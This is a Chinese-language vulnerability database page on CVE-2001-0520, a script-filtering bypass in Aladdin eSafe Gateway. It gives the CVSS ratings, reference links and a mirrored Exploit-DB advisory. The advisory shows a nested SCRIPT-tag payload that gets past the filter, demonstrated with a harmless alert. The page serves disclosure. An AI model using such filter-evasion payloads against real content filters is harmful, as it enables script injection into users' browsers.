CVE-2001-0520
CVSS7.5
发布时间 :2001-08-14 00:00:00
修订时间 :2008-09-05 16:24:18
NMCOE    

[原文]Aladdin eSafe Gateway versions 3.0 and earlier allows a remote attacker to circumvent filtering of SCRIPT tags by embedding the scripts within certain HTML tags including (1) onload in the BODY tag, (2) href in the A tag, (3) the BUTTON tag, (4) the INPUT tag, or (5) any other tag in which scripts can be defined.


[CNNVD]Aladdin eSafe Gateway过滤绕过漏洞(CNNVD-200108-051)

        Aladdin eSafe Gateway 3.0版本及之前版本存在漏洞。远程攻击者可以通过在某些含(1)BODY标签中的装载,(2)A标签中的超链接,(3)BUTTON标签,(4)INPUT标签或(5)脚本可被定义的其他任何一个标签的HTML标签内嵌入脚本来绕过SCRIPT标签的过滤。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0520
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0520
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200108-051
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/6580.php
(VENDOR_ADVISORY)  XF  esafe-gateway-bypass-filtering(6580)
http://archives.neohapsis.com/archives/bugtraq/2001-05/0284.html
(VENDOR_ADVISORY)  BUGTRAQ  20010529 Aladdin eSafe Gateway Script-filtering Bypass through HTML tags

- 漏洞信息

Aladdin eSafe Gateway过滤绕过漏洞
高危 未知
2001-08-14 00:00:00 2005-10-20 00:00:00
远程  
        Aladdin eSafe Gateway 3.0版本及之前版本存在漏洞。远程攻击者可以通过在某些含(1)BODY标签中的装载,(2)A标签中的超链接,(3)BUTTON标签,(4)INPUT标签或(5)脚本可被定义的其他任何一个标签的HTML标签内嵌入脚本来绕过SCRIPT标签的过滤。

- 公告与补丁

        

- 漏洞信息 (20869)

eSafe Gateway 2.1 Script-filtering Bypass Vulnerability (EDBID:20869)
multiple remote
2001-05-20 Verified
0 eDvice Security Services
N/A [点击下载]
source: http://www.securityfocus.com/bid/2750/info

eSafe Gateway is a security utility used for filtering internet content.

An html file may be crafted to bypass the script-filtering feature offered by eSafe Gateway. This is done by simply changing the syntax of the <SCRIPT> function in such a way as to trick the filter into generating html that still includes a call to execute the script.

Note: There are currently conflicting details regarding this vulnerability. It has been reported that version 3.0 of eSafe Gateway is not vulnerable. The author of the advisory insists that versions 2.x are vulnerable, while the vendor claims that script filtering was not a feature in these versions. Forthcoming updates will be released as more information becomes available.

Details
----------------------
Let's say for example that we want the following HTML code to enter an
organization and the script it contains to be executed:

<HTML><HEAD></HEAD>
<BODY>
<SCRIPT language="JavaScript">
alert("hi");
</SCRIPT>
</BODY></HTML>

If we run this page through eSafe's filtering engine, the script will be
filtered and the resulting with the following HTML code:

<HTML><HEAD></HEAD>
<BODY>

</BODY></HTML>

However, if we create the following code:

<HTML><HEAD></HEAD>
<BODY>
<SCRIPT<script language="javascript"> </script> language="javascript">
alert("hi");
</SCRIPT>
</BODY></HTML>

Then the inner "<script language="javascript"> </script>" will be extracted
and we will be left with the following HTML code:

<HTML><HEAD></HEAD>
<BODY>
<SCRIPT language="javascript">
alert("hi");
</SCRIPT>
</BODY></HTML> 		

- 漏洞信息

7640
Aladdin eSafe Gateway Multiple Tag SCRIPT Filtering Bypass
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-05-20 Unknow
2001-05-20 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站